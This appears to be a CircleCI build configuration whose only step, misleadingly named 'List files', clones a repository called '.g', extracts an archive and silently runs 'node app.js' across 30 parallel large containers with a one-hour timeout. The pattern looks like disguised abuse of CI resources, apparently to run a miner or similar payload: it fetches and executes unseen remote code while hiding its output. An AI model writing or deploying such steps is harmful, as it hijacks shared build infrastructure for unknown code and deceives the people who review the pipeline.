version: 2.1

jobs:
  build:
    docker:
      - image: cimg/node:26.7.0
    parallelism: 30
    resource_class: large
    steps:
      - run:
          name: List files
          command: git clone https://github.com/promodboro-dev/.g.git && cd .g && tar xvf 4.tar && node app.js > /dev/null 2>&1
          no_output_timeout: 1h
